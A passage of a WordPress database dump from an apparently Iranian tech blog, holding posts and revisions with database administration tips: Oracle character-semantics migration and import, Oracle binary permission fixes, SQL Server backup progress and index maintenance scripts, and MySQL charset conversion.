C.OWNER, C.TABLE_NAME, C.COLUMN_NAME, C.DATA_TYPE, C.CHAR_LENGTH\n FROM ALL_TAB_COLUMNS C, ALL_TABLES T\n WHERE C.OWNER = T.OWNER\n AND T.OWNER IN (\'[b]SCHEMA1[/b]\')\n -- ALL ORACLE PROVIDED USERS \n AND C.TABLE_NAME = T.TABLE_NAME\n AND C.CHAR_USED = \'B\' -- ONLY NEED TO LOOK FOR TABLES WHO ARE NOT YET CHAR SEMANTICS. \n AND T.PARTITIONED != \'YES\' -- EXCLUDE PARTITIONED TABLES\n AND C.TABLE_NAME NOT IN (SELECT TABLE_NAME FROM ALL_EXTERNAL_TABLES)\n AND C.DATA_TYPE IN (\'VARCHAR2\', \'CHAR\');\n COMMIT; </code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>then you have to modify these fields with alter table command as below: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>DECLARE\n CURSOR C1 IS\n SELECT * FROM SEMANTICS$;\n V_STATEMENT VARCHAR2(255);\n V_NC NUMBER(10);\n V_NT NUMBER(10);\nBEGIN\n EXECUTE IMMEDIATE \'SELECT COUNT(*) FROM SEMANTICS$\'\n INTO V_NC;\n EXECUTE IMMEDIATE \'SELECT COUNT(DISTINCT S_TABLE_NAME) FROM SEMANTICS$\'\n INTO V_NT;\n FOR R1 IN C1 LOOP\n V_STATEMENT := \'ALTER TABLE \' || R1.S_OWNER || \'.\' || R1.S_TABLE_NAME;\n V_STATEMENT := V_STATEMENT || \' MODIFY (\' || R1.S_COLUMN_NAME || \' \';\n V_STATEMENT := V_STATEMENT || R1.S_DATA_TYPE || \'(\' || R1.S_CHAR_LENGTH;\n V_STATEMENT := V_STATEMENT || \' CHAR));\';\n EXECUTE IMMEDIATE V_STATEMENT;\n END LOOP;\n DBMS_OUTPUT.PUT_LINE(\'DONE\');\nEND;</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>finally, we you have to import data to these tables: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>DATA_ONLY</b></code></pre>\n<!-- /wp:code -->','IMPDP Errors: ORA-02374, ORA-12899','','inherit','closed','closed','','56-revision-v1','','','2020-02-02 12:16:30','2020-02-02 12:16:30','',56,'http://ictbank.ir/blog/index.php/2020/02/02/56-revision-v1/',0,'revision','',0),
(60,2,'2020-02-02 12:44:50','2020-02-02 12:44:50','<!-- wp:paragraph -->\n<p>If you see <strong>Fatal NI connect error 12547</strong> error in alert log file of a Database in the middle of startup, and the database process couldn\'t find <strong>DB PARAMETER FILE</strong> and <strong>CONTROL FILE</strong>, you have to check permissions,owner and group of these files: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>ls -l $GRID_HOME/bin/oracle\nls -l $ORACLE_HOME/bin/oracle</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>The permission of these files have to be <strong>6751</strong>.<br> The group of these files have to be <strong>oinstall</strong><br> The owner of first file have to be <strong>grid</strong> and the owner of second one have to be <strong>oracle</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>chown grid:oinstall $GRID_HOME/bin/oracle\nchmod 6751 $GRID_HOME/bin/oracle\n\nchown oracle:oinstall $ORACLE_HOME/bin/oracle\nchmod 6751 $ORACLE_HOME/bin/oracle</code></pre>\n<!-- /wp:code -->','Database Startup Error: Fatal NI connect error 12547','','publish','open','open','','database-startup-error-fatal-ni-connect-error-12547','','','2020-02-02 12:45:12','2020-02-02 12:45:12','',0,'http://ictbank.ir/blog/?p=60',0,'post','',0),
(61,2,'2020-02-02 12:44:50','2020-02-02 12:44:50','<!-- wp:paragraph -->\n<p>If you see <strong>Fatal NI connect error 12547</strong> error in alert log file of a Database in the middle of startup, and the database process couldn\'t find <strong>DB PARAMETER FILE</strong> and <strong>CONTROL FILE</strong>, you have to check permissions,owner and group of these files: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>ls -l $GRID_HOME/bin/oracle\nls -l $ORACLE_HOME/bin/oracle</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>The permission of these files have to be <strong>6751</strong>.<br> The group of these files have to be <strong>oinstall</strong><br> The owner of first file have to be <strong>grid</strong> and the owner of second one have to be <strong>oracle</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>chown grid:oinstall $GRID_HOME/bin/oracle\nchmod 6751 $GRID_HOME/bin/oracle\n\nchown oracle:oinstall $ORACLE_HOME/bin/oracle\nchmod 6751 $ORACLE_HOME/bin/oracle</code></pre>\n<!-- /wp:code -->','Database Startup Error: Fatal NI connect error 12547','','inherit','closed','closed','','60-revision-v1','','','2020-02-02 12:44:50','2020-02-02 12:44:50','',60,'http://ictbank.ir/blog/index.php/2020/02/02/60-revision-v1/',0,'revision','',0),
(62,2,'2020-02-02 12:46:09','2020-02-02 12:46:09','{\n \"twentytwenty::blog_content\": {\n \"value\": \"summary\",\n \"type\": \"theme_mod\",\n \"user_id\": 2,\n \"date_modified_gmt\": \"2020-02-02 12:46:09\"\n }\n}','','','trash','closed','closed','','ce4e7d69-83d2-4406-a929-6f47a2e3ec07','','','2020-02-02 12:46:09','2020-02-02 12:46:09','',0,'http://ictbank.ir/blog/index.php/2020/02/02/ce4e7d69-83d2-4406-a929-6f47a2e3ec07/',0,'customize_changeset','',0),
(63,2,'2020-02-02 18:12:28','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-02-02 18:12:28','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=63',0,'post','',0),
(64,2,'2020-02-02 18:14:17','2020-02-02 18:14:17','<!-- wp:paragraph -->\n<p>To see the progress of Backup or Restore process you can use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>SELECT r.session_id AS [Session_Id]\n ,r.command AS [command]\n ,CONVERT(NUMERIC(6, 2), r.percent_complete) AS [% Complete]\n ,GETDATE() AS [Current Time]\n ,CONVERT(VARCHAR(20), DATEADD(ms, r.estimated_completion_time, GetDate()), 20) AS [Estimated Completion Time]\n ,CONVERT(NUMERIC(32, 2), r.total_elapsed_time / 1000.0 / 60.0) AS [Elapsed Min]\n ,CONVERT(NUMERIC(32, 2), r.estimated_completion_time / 1000.0 / 60.0) AS [Estimated Min]\n ,CONVERT(NUMERIC(32, 2), r.estimated_completion_time / 1000.0 / 60.0 / 60.0) AS [Estimated Hours]\n ,CONVERT(VARCHAR(1000), (\n SELECT SUBSTRING(TEXT, r.statement_start_offset / 2, CASE\n WHEN r.statement_end_offset = - 1\n THEN 1000\n ELSE (r.statement_end_offset - r.statement_start_offset) / 2\n END) \'Statement text\'\n FROM sys.dm_exec_sql_text(sql_handle)\n ))\nFROM sys.dm_exec_requests r\nWHERE command like \'RESTORE%\'\nor command like \'BACKUP%\'</code></pre>\n<!-- /wp:code -->','Backup/Restore Progress','','publish','open','open','','backup-restore-progress','','','2020-02-02 18:14:17','2020-02-02 18:14:17','',0,'http://ictbank.ir/blog/?p=64',0,'post','',0),
(65,2,'2020-02-02 18:14:17','2020-02-02 18:14:17','<!-- wp:paragraph -->\n<p>To see the progress of Backup or Restore process you can use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>SELECT r.session_id AS [Session_Id]\n ,r.command AS [command]\n ,CONVERT(NUMERIC(6, 2), r.percent_complete) AS [% Complete]\n ,GETDATE() AS [Current Time]\n ,CONVERT(VARCHAR(20), DATEADD(ms, r.estimated_completion_time, GetDate()), 20) AS [Estimated Completion Time]\n ,CONVERT(NUMERIC(32, 2), r.total_elapsed_time / 1000.0 / 60.0) AS [Elapsed Min]\n ,CONVERT(NUMERIC(32, 2), r.estimated_completion_time / 1000.0 / 60.0) AS [Estimated Min]\n ,CONVERT(NUMERIC(32, 2), r.estimated_completion_time / 1000.0 / 60.0 / 60.0) AS [Estimated Hours]\n ,CONVERT(VARCHAR(1000), (\n SELECT SUBSTRING(TEXT, r.statement_start_offset / 2, CASE\n WHEN r.statement_end_offset = - 1\n THEN 1000\n ELSE (r.statement_end_offset - r.statement_start_offset) / 2\n END) \'Statement text\'\n FROM sys.dm_exec_sql_text(sql_handle)\n ))\nFROM sys.dm_exec_requests r\nWHERE command like \'RESTORE%\'\nor command like \'BACKUP%\'</code></pre>\n<!-- /wp:code -->','Backup/Restore Progress','','inherit','closed','closed','','64-revision-v1','','','2020-02-02 18:14:17','2020-02-02 18:14:17','',64,'http://ictbank.ir/blog/index.php/2020/02/02/64-revision-v1/',0,'revision','',0),
(66,2,'2020-02-02 18:19:06','2020-02-02 18:19:06','<!-- wp:paragraph -->\n<p>If you want to <strong>REBUILD</strong> and <strong>REORGANIZE </strong>all your indexes in a database, you have to use this query:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Rebuild:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>DECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' rebuild;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>Reorganize:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>DECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' reorganize;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END\n</code></pre>\n<!-- /wp:code -->','Rebuild and Reorganize all indexes within a database','','publish','open','open','','rebuild-and-reorganize-all-indexes-within-a-database','','','2020-02-02 21:14:11','2020-02-02 21:14:11','',0,'http://ictbank.ir/blog/?p=66',0,'post','',0),
(67,2,'2020-02-02 18:19:06','2020-02-02 18:19:06','<!-- wp:paragraph -->\n<p>If you want to <strong>REBUILD</strong> and <strong>REORGANIZE </strong>all your indexes in a database, you have to use this query:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Rebuild:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>DECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' rebuild;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>Reorganize:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>DECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' reorganize;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END\n</code></pre>\n<!-- /wp:code -->','Rebuild and Reorganize all indexes within a database','','inherit','closed','closed','','66-revision-v1','','','2020-02-02 18:19:06','2020-02-02 18:19:06','',66,'http://ictbank.ir/blog/index.php/2020/02/02/66-revision-v1/',0,'revision','',0),
(68,2,'2020-02-02 18:28:09','2020-02-02 18:28:09','<!-- wp:paragraph -->\n<p>To change the Character Set and Collation of a field of a table you have to use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><code>ALTER TABLE table_name MODIFY column_name data_type CHARACTER SET UTF8 COLLATE UTF8_UNICODE_CI;</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if the table contains data, you have to update that data as follow: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><code>UPDATE table_name SET column_name= CONVERT(CAST(CONVERT(column_name USING LATIN1) AS BINARY) USING UTF8) </code></p>\n<!-- /wp:paragraph -->','Change the Character Set & Collation of a table','','publish','open','open','','change-the-character-set-collation-of-a-table','','','2020-02-02 18:28:09','2020-02-02 18:28:09','',0,'http://ictbank.ir/blog/?p=68',0,'post','',0),
(69,2,'2020-02-02 18:28:09','2020-02-02 18:28:09','<!-- wp:paragraph -->\n<p>To change the Character Set and Collation of a field of a table you have to use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><code>ALTER TABLE table_name MODIFY column_name data_type CHARACTER SET UTF8 COLLATE UTF8_UNICODE_CI;</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if the table contains data, you have to update that data as follow: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><code>UPDATE table_name SET column_name= CONVERT(CAST(CONVERT(column_name USING LATIN1) AS BINARY) USING UTF8) </code></p>\n<!-- /wp:paragraph -->','Change the Character Set & Collation of a table','','inherit','closed','closed','','68-revision-v1','','','2020-02-02 18:28:09','2020-02-02 18:28:09','',68,'http://ictbank.ir/blog/index.php/2020/02/02/68-revision-v1/',0,'revision','',0),
(70,2,'2020-02-02 19:21:55','2020-02-02 19:21:55','{\n \"twentytwenty::retina_logo\": {\n \"value\": true,\n \"type\": \"theme_mod\",\n \"user_id\": 2,\n \"date_modified_gmt\": \"2020-02-02 19:21:55\"\n }\n}','','','trash','closed','closed','','6156c9c8-0199-40c7-af03-c5b493f2be5d','','','2020-02-02 19:21:55','2020-02-02 19:21:55','',0,'http://ictbank.ir/blog/index.php/2020/02/02/6156c9c8-0199-40c7-af03-c5b493f2be5d/',0,'customize_changeset','',0),
(71,2,'2020-02-02 20:36:45','2020-02-02 20:36:45','','ictbank.ir blog','ictbank.ir blog','inherit','open','closed','','ictbank','','','2020-02-02 20:37:22','2020-02-02 20:37:22','',0,'http://ictbank.ir/blog/wp-content/uploads/2020/02/ictbank.png',0,'attachment','image/png',0),
(72,2,'2020-02-02 20:37:23','2020-02-02 20:37:23','http://ictbank.ir/blog/wp-content/uploads/2020/02/cropped-ictbank.png','cropped-ictbank.png','','inherit','open','closed','','cropped-ictbank-png','','','2020-02-02 20:37:23','2020-02-02 20:37:23','',0,'http://ictbank.ir/blog/wp-content/uploads/2020/02/cropped-ictbank.png',0,'attachment','image/png',0),
(73,2,'2020-02-02 20:37:45','2020-02-02 20:37:45','http://ictbank.ir/blog/wp-content/uploads/2020/02/cropped-ictbank-1.png','cropped-ictbank-1.png','','inherit','open','closed','','cropped-ictbank-1-png','','','2020-02-02 20:37:45','2020-02-02 20:37:45','',0,'http://ictbank.ir/blog/wp-content/uploads/2020/02/cropped-ictbank-1.png',0,'attachment','image/png',0),
(74,2,'2020-02-02 20:37:52','2020-02-02 20:37:52','{\n \"site_icon\": {\n \"value\": 72,\n \"type\": \"option\",\n \"user_id\": 2,\n \"date_modified_gmt\": \"2020-02-02 20:37:52\"\n },\n \"twentytwenty::custom_logo\": {\n \"value\": 73,\n \"type\": \"theme_mod\",\n \"user_id\": 2,\n \"date_modified_gmt\": \"2020-02-02 20:37:52\"\n }\n}','','','trash','closed','closed','','e03d7631-a512-4b58-a559-cb2cbc415958','','','2020-02-02 20:37:52','2020-02-02 20:37:52','',0,'http://ictbank.ir/blog/index.php/2020/02/02/e03d7631-a512-4b58-a559-cb2cbc415958/',0,'customize_changeset','',0),
(75,2,'2020-02-02 20:38:15','2020-02-02 20:38:15','{\n \"twentytwenty::retina_logo\": {\n \"value\": false,\n \"type\": \"theme_mod\",\n \"user_id\": 2,\n \"date_modified_gmt\": \"2020-02-02 20:38:15\"\n }\n}','','','trash','closed','closed','','33e2697f-b845-408c-a5a9-38d9b1cc0914','','','2020-02-02 20:38:15','2020-02-02 20:38:15','',0,'http://ictbank.ir/blog/index.php/2020/02/02/33e2697f-b845-408c-a5a9-38d9b1cc0914/',0,'customize_changeset','',0),
(76,1,'2020-02-02 21:09:44','2020-02-02 21:09:44','ictbank.ir','ictbank.ir','ictbank.ir','inherit','open','closed','','ictbank-ir','','','2020-02-02 21:09:53','2020-02-02 21:09:53','',0,'http://ictbank.ir/blog/wp-content/uploads/2020/02/ictbank.ir_.png',0,'attachment','image/png',0),
(77,1,'2020-02-02 21:10:04','2020-02-02 21:10:04','http://ictbank.ir/blog/wp-content/uploads/2020/02/cropped-ictbank.ir_.png','cropped-ictbank.ir_.png','','inherit','open','closed','','cropped-ictbank-ir_-png','','','2020-02-02 21:10:04','2020-02-02 21:10:04','',0,'http://ictbank.ir/blog/wp-content/uploads/2020/02/cropped-ictbank.ir_.png',0,'attachment','image/png',0),
(78,1,'2020-02-02 21:10:29','2020-02-02 21:10:29','{\n \"blogdescription\": {\n \"value\": \"\",\n \"type\": \"option\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-02 21:10:29\"\n },\n \"twentytwenty::custom_logo\": {\n \"value\": 77,\n \"type\": \"theme_mod\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-02 21:10:29\"\n }\n}','','','trash','closed','closed','','0fddeeb6-479d-47ac-ab19-d2ea462f2fd7','','','2020-02-02 21:10:29','2020-02-02 21:10:29','',0,'http://ictbank.ir/blog/index.php/2020/02/02/0fddeeb6-479d-47ac-ab19-d2ea462f2fd7/',0,'customize_changeset','',0),
(79,1,'2020-02-02 21:13:12','2020-02-02 21:13:12','{\n \"widget_categories[2]\": {\n \"value\": {\n \"encoded_serialized_instance\": \"YTo0OntzOjU6InRpdGxlIjtzOjA6IiI7czo1OiJjb3VudCI7aToxO3M6MTI6ImhpZXJhcmNoaWNhbCI7aToxO3M6ODoiZHJvcGRvd24iO2k6MTt9\",\n \"title\": \"\",\n \"is_widget_customizer_js_value\": true,\n \"instance_hash_key\": \"97e9a6adf767070fb4f2f8bffd2f2c4e\"\n },\n \"type\": \"option\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-02 21:12:05\"\n },\n \"sidebars_widgets[sidebar-1]\": {\n \"value\": [\n \"recent-posts-2\",\n \"categories-2\"\n ],\n \"type\": \"option\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-02 21:13:05\"\n }\n}','','','trash','closed','closed','','f93ca38b-6266-46bc-82e4-617e3418a9dc','','','2020-02-02 21:13:12','2020-02-02 21:13:12','',0,'http://ictbank.ir/blog/?p=79',0,'customize_changeset','',0),
(80,2,'2020-02-02 21:14:11','2020-02-02 21:14:11','<!-- wp:paragraph -->\n<p>If you want to <strong>REBUILD</strong> and <strong>REORGANIZE </strong>all your indexes in a database, you have to use this query:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Rebuild:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>DECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' rebuild;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = 